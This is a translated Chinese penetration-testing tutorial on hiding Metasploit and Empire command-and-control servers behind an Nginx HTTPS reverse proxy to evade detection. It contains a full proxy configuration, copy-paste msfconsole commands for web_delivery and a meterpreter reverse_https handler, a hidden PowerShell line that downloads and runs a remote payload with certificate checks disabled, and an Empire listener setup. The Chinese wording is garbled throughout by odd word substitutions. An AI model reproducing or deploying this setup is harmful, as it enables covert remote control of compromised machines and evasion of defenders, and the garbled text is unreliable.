翻译:WisFree
预估稿费:200RMB(不服你也来投稿啊!
)
投稿办法:发送邮件至linwei#360.cn,或上岸网页版在线投稿
根本知识
目前,很大一部分盛行的命令掌握(C&C)工具都是通过HTTP来传输网络通信数据的,例如Metasploit和Empire。对付C&C工具而言,之以是HTTP协议是一个更加高效的选择,紧张是由于这个协议险些适用于目前所有类型的通信网络以及网络设备。除此之外,利用“HTTP over TLS”可以为这些工具添加一个额外的安全层,由于这项技能将会使我们更加难以去检测到C&C流量。如果企业或组织拥有一个配置精确的Web代理,那么这个能够实行SSL/TLS检讨的代理将会帮助安全技能职员更好地检测C&C流量。但是在我所帮助测试过的组织中,并没有多少组织采纳了这样的安全方法。
为了掩饰笼罩所有的造孽操作,通过HTTP协议传输的C&C流量该当通过80端口或者443端口来发送。如果利用类似8080这样的分外端口来发送C&C数据的话,不仅会引起管理员疑惑,而且也逃不过安全防护软件的检测。就我个人而言,我喜好在同一台主机中利用多种类型的工具。如果我要在一台主机中同时利用Empire和Metasploit的网络传输模块,我将统共须要三个网络端口,一样平常来说我会选择利用80端口、8080端口、以及443端口。但是现在,我想要让所有的网络流量全部通过端口443来发送。因此,我现在就要利用Sword&Shield所供应的安全剖析做事了,这样我就可以利用一个C&C代理来完成所有的剖析操作。
接下来,我打算利用Nginx来搭建一个反向代理做事器。如下图所示,这样我们就可以利用一台Web做事器来同时处理多用户-多工具的情形了。当代理做事器配置完成之后,代理规则将会卖力对发送至C2做事器端口的流量进行划分。除此之外,这样的配置也可以隐蔽C&C做事器的“真实身份”(实际主机)。Nginx不仅安装和配置非常大略,而且操作起来也非常便捷。多用户-多工具的C&C代理架构图如下图所示:
Nginx的安装与配置
首先,将你最喜好的Linux发行版安装至一台VPS做事器中,你乐意的话也可以将其安装在自己的做事器里。为了方便大家理解,我选择将Ubuntu 16.10安装在一台VPS主机中。如果各位同学在Nginx的安装和运行上碰着了困难的话,可以参阅这份教程[教程获取]。通过配置之后,我的做事器仅启用了80端口,并且只许可网络流量通过443端口来发送。
在测试开始之前,我们一定要将Nginx配置好,否则代理做事器将会不知道如何去处理那些通信连接。为了防止暴力破解攻击,我们要为每一个剖析器分配一个GUID。你可以点击这里来天生相应的GUID。我所天生的GUID如下表所示:
我统共设置了三个剖析器,每一个剖析器的干系配置信息如下所示:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657#Analyst 1
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/ {
proxy_redirect off;
#Empire
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/ {
proxy_pass https://205.232.71.92:443;
}
#Metasploit
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/ {
#Metasploit exploit/multi/script/web_delivery
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery {
proxy_pass https://205.232.71.92:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned {
proxy_pass https://205.232.71.92:80;
}
}
}
#Analyst 2
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/ {
proxy_redirect off;
#Empire
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/e/ {
proxy_pass https://1.2.3.5:443;
}
#Metasploit
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/ {
#Metasploit exploit/multi/script/web_delivery
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Delivery {
proxy_pass https://1.2.3.5:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /30061CD8-0CEE-4381-B3F8-B50DCACA4CC8/m/Pwned {
proxy_pass https://1.2.3.5:80;
}
}
}
#Analyst 3
location /6012A46E-C00C-4816-9DEB-7B2697667D92/ {
proxy_redirect off;
#Empire
location /6012A46E-C00C-4816-9DEB-7B2697667D92/e/ {
proxy_pass https://1.2.3.6:443;
}
#Metasploit
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/ {
#Metasploit exploit/multi/script/web_delivery
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Delivery {
proxy_pass https://1.2.3.6:8080;
}
#Metasploit Payload windows/x64/meterpreter/reverse_https
location /6012A46E-C00C-4816-9DEB-7B2697667D92/m/Pwned {
proxy_pass https://1.2.3.6:80;
}
}
}
由于我们要让Nginx须要区分出Metasploit和Empire的要求,以是我突发奇想,打算用‘m’来代表Metasploit,用‘e’来代表Empire。Empire的C2要求如下所示:
1https://myc2proxy.com/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/index.asp
现在,既然我们已经可以确定传入的HTTP要求所利用的语句了,那么Nginx就须要将每一个要求转发至适当的剖析代理做事器中,这项操作可以利用Nginx配置文件(/etc/nginx/sites-enabled/default)中的定位指令来完成。在这篇文章中,我们要为每一个剖析器分别设置四个定位指令。在上面这段代码中,最外层的指令将会与剖析器的GUID进行匹配。内层的定位指令紧张用来匹配针对特定工具的要求,例如‘e’(Empire)和‘m’(Metasploit)。Metasploit的定位指令包含两个子定位指令,这两个指令可以用来匹配传入Metasploit特定模块和监听器的网络要求。
现在,C&C代理做事器该当配置完成并且可以正常运行了。如果配置无误的话,我们将只能利用TLS连接和端口443来与做事器进行通信。
Metasploit的安装与配置
众所周知,Metasploit供应了很多的功能模块,我们可以利用这些模块来与目标用户的打算机建立C2连接。我个人比较喜好利用“exploit/multi/script/web_delivery”模块来作为launcher。我之以是非常喜好这个模块,紧张是由于它可以将meterpreter(ShellCode)注入至目标主机的内存中。这是一种非常空想的情形,由于你可以直策应用目标主机中的内置工具来进行操作,而不必向目标主机发送任何的文件。
接下来,我们要加载Nginx配置文件所须要利用的Metasploit模块,并利用URIPATH来对其进行设置。须要把稳的是,自带的payload handler必须被禁用,由于我们要单独配置这些payload。在配置这个模块的过程中,payload利用的是“windows/x64/meterpreter/reverse_https”,然后将LHOST和LPORT设置为C2代理做事器的IP地址和端口号。请把稳,这里可千万不要设置成后台C2做事器的IP地址了。除此之外,我们还要设置与payload(例如Pwned)和Nginx中的指令相匹配的LURI。虽然相应的监听器根本不会启动,但我们仍旧要去配置这些payload。由于接下来当模块被实行之后,我们要利用这些设置来天生显示在屏幕中的启动命令。我们可以将下面给出的这段指令直接复制粘贴到msfconsole中来配置并启动该模块:
12345678910use exploit/multi/script/web_delivery
set URIPATH /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery
set DisablePayloadHandler true
set SSL True
set TARGET 2
set payload windows/x64/meterpreter/reverse_https
set LHOST myc2proxy.com
set LPORT 443
set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned
run –j
下图显示的是Metasploit中web_delivery模块的配置信息:
当模块被实行后,屏幕中会显示一个包含有启动代码的字符串。请把稳:必须将网络端口由8080改为443,否则之后将无法再进行修正了。除此之外,我们还必须手动去修正,由于我们的C2代理只会接管来自端口443的通信要求。这个字符串如下所示:
1powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$o=new-object net.webclient;$o.proxy=[Net.WebRequest]::GetSystemWebProxy();$o.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $o.downloadstring('https://myc2proxy.com:8080/E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Delivery');
接下来,将LHOST设置为0.0.0.0,LPORT设置为80(端口号的设置可以根据后台C2做事器来选择)。我们还须要配置OverrideLHOST、OverrideLPORT、以及OverrideRequestHost来确保payload可以直接与C2代理做事器进行对话。我们可以将下面给出的命令直接复制粘贴到msfconsole中来配置并启动该模块:
12345678910use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 80
set LURI /E0922BB0-684B-4ED3-967E-85D08880CFD5/m/Pwned
set OverrideLHOST myc2proxy.com
set OverrideLPORT 443
set OverrideRequestHost true
set ExitOnSession false
run –j
下图显示的是reverse_https的payload配置信息:
Empire的安装与配置
虽然Empire是我最喜好的一款工具,但是在配置代理做事器的过程中,利用Empire之前还是有几个障碍须要战胜的,比较之下Metasploit的配置和利用就大略多了。在PowerShell v1中,初始链接序列所利用STAGE0、STAGE1和STAGE2是在empire.db的配置表中定义的。在我看来,我们是无法在Empire CLI中修正这部分数据的,以是我们必须直接手动修正数据库。但是,PowerShell Empire v2并没有利用这种架构。我建议各位同学利用git来下载Empire v2分支,命令如下:
1cd /opt;git clone -b 2.0_beta https://github.com/adaptivethreat/Empire.git
下载完成之后,启动运用。由于Empire监听器所利用的端口必须与C2代理做事器的监听端口相同,以是Empire必须利用端口443和HTTPS协议。我们可以直接将下面给出的这段命令复制粘贴进Empire中来配置监听器:
123456789listeners
uselistener http
set DefaultProfile /E0922BB0-684B-4ED3-967E-85D08880CFD5/e/admin/get.php,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/news.asp,/E0922BB0-684B-4ED3-967E-85D08880CFD5/e/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;rv:11.0) like Gecko
set Name EmpireC2
set CertPath /opt/Empire/data/empire.pem
set Host https://myc2proxy.com
set Port 443
execute
launcher powershell
Empire监听器的配置信息如下图所示:
实行
现在,我们已经为Nginx C2代理配置好了一个用于剖析数据流量的后台C2做事器了。接下来,我们要在测试主机中实行我们所天生的个中一个launcher,你将会在后台C2做事器中看到测试主机的shell。为了增加安全方法,配置后台C2做事器只许可当前C2代理访问。
结论
代理可以用来保持后台做事的匿名性。当你须要在某个网络中进行命令掌握活动时,代理所供应的这种特性是非常有用的。由于HTTPS的通信数据足够安全,因此现在越来越多的网络都开始利用HTTPS来进行通信了。但是,这也将有助于我们躲避安全产品的检测。